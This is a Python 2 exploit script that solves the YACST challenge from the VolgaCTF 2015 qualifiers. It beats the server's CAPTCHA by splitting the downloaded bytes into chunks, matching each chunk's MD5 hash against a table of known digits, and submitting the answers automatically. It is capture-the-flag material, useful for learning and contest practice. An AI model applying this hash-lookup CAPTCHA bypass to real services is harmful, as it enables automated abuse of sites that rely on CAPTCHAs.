#!/usr/bin/env python2

'''
VolgaCTF 2015 Quals
YACST challenge

Exploit by Rogdham
2015.05.03
See http://r.rogdham.net/25
Licence: CC0

    This program is free software. It comes without any warranty, to the extent
    permitted by applicable law. You can redistribute it and/or modify it under
    the terms of the CC0 1.0 Universal Licence (French).
    See CC0 https://creativecommons.org/publicdomain/zero/1.0/deed.fr for more
    details.
'''

import requests
from hashlib import md5


digits = {
    '842bf5ced04caf93caf055430839a014': '0',
    'b61a12ad7c07357282b4ad3970f61402': '1',
    '31b0bc1a2ed50e8560309bea1d88be4a': '2',
    '3b6fc06446f372ef00b56bcc533ee53e': '3',
    '4cb7ec584d356fe800b56c49d89cb5db': '4',
    '1c3224e385e01d1f450d5c7e7ebb2b7e': '5',
    'ac30360ff34135e1744a387ae32529cc': '6',
    '9440b7abfe397f7b864630553681098f': '7',
    'caf62c8fd0dea1ad8d6d17ff3dffd4bc': '8',
    '86e5e62893298933511731ee1ffa2058': '9',
}

def parse_bytes(x):
    out = []
    for part in x.split('\xff' * 100):
        part = part.strip('\xff')
        if len(part) > 1000:
            part = md5(part).hexdigest()
            assert part in digits
            out.append(digits[part])
    assert len(out) == 6
    return ''.join(out)

def get_captcha(session, url):
    r = session.get(url + 'captcha', stream=True)
    return parse_bytes(r.content)

def solve(url):
    session = requests.Session()
    for _ in xrange(5):
        c = get_captcha(session, url)
        print c
        r = session.post(url + 'captcha', data={'captcha': c})
    print r.content


if __name__ == '__main__':
    solve('http://yacst.2015.volgactf.ru/')
